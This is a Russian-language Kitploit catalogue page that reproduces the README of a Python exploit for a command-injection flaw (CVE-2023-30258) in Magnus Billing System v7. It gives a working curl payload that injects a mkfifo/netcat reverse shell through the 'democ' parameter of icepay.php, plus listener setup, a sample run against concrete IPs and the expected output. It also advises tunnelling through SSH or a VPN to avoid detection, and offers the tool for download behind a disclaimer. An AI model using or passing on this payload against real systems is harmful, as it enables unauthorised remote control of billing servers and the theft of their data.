Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit | Kitploit
Инструменты/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
711 год назадЕщё не проверено

Эксплойт для Magnus Billing System v7

Этот Python-скрипт автоматизирует эксплуатацию уязвимости внедрения команд в Magnus Billing System v7, а именно в скрипте icepay.php, расположенном по пути /mbilling/lib/icepay/icepay.php. Эксплойт использует параметр democ для выполнения произвольных команд на целевой системе, в конечном итоге устанавливая реверс-шелл на машину злоумышленника.

Обзор уязвимости

Уязвимость позволяет неавторизованное внедрение команд с помощью специально сформированного GET-запроса. Первоначальный proof-of-concept (PoC) использовал следующую команду curl:

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

Этот скрипт автоматизирует этот процесс, делая его настраиваемым через аргументы командной строки.

Возможности

  • Настраиваемый: Укажите IP-адрес цели, IP-адрес атакующего и порт через аргументы командной строки
  • Простой: Использует библиотеку requests для отправки HTTP-запроса с полезной нагрузкой
  • Обратная связь: Обеспечивает понятный вывод для отслеживания хода выполнения эксплойта

Предварительные требования

  • Python 3.x: Убедитесь, что Python 3 установлен в вашей системе
  • Библиотека Requests: Установите Python-модуль requests:
    root@kitploit:~
    pip install requests
    
  • Netcat: На целевой системе должен быть установлен netcat (nc), чтобы реверс-шелл работал
  • Слушатель: Настройте netcat-слушатель на машине атакующего, чтобы поймать реверс-шелл
  • Уязвимая цель: Цель должна работать под управлением Magnus Billing System v7, и уязвимый скрипт icepay.php должен быть доступен

Использование

Настройка

  1. Клонирование или загрузка: Сохраните скрипт как exploit.py
  2. Настройка слушателя: На вашей машине атакующего запустите netcat-слушатель:
    root@kitploit:~
    nc -lvnp <PORT>
    
    Замените <PORT> на выбранный вами порт (например, 443)

Запуск эксплойта

root@kitploit:~
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

Параметры:

  • -t, --target: IP-адрес целевой системы Magnus Billing System
  • -a, --attacker: Ваш IP-адрес для получения реверс-шелла
  • -p, --port: Порт на вашей машине для реверс-шелла

Пример

root@kitploit:~
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

Ожидаемый вывод:

root@kitploit:~
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. Получите шелл: Переключитесь на ваш netcat-слушатель, чтобы взаимодействовать с реверс-шеллом в случае успеха

Технические примечания

  • Тип полезной нагрузки: Скрипт использует реверс-шелл на основе FIFO (mkfifo) с помощью netcat
  • Обработка ошибок: Включены базовые проверки сетевых ошибок и недопустимых портов
  • Отладка: Чтобы просмотреть ответ сервера, раскомментируйте print(response.text) в функции exploit()
  • Альтернативные полезные нагрузки: При необходимости скрипт можно изменить для использования других полезных нагрузок реверс-шелла

Устранение неполадок

  • Если соединение не удается, проверьте следующее:
    • На целевой системе установлен netcat
    • Брандмауэр не блокирует соединение
    • Используются правильные порты
    • Цель не была пропатчена

Рекомендации по безопасности

  • Рассмотрите возможность использования SSH-туннелирования или VPN при использовании этого эксплойта, чтобы избежать обнаружения
  • Полезная нагрузка может вызвать срабатывание систем мониторинга безопасности

Отказ от ответственности

Этот инструмент предоставляется только в образовательных целях и для тестирования безопасности. Используйте его только на системах, на тестирование которых у вас есть явное разрешение. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет согласия, является незаконным и неэтичным. Автор не несет ответственности за любое неправильное использование или ущерб, причиненный этим скриптом.

Лицензия

Этот проект выпущен под лицензией MIT. Не стесняйтесь изменять и распространять его по мере необходимости, сохраняя отказ от ответственности без изменений.

Вклад в проект

Приветствуются вклады, сообщения об ошибках и запросы новых функций. Пожалуйста, не стесняйтесь отправлять pull request или открывать issue.

Скачать инструмент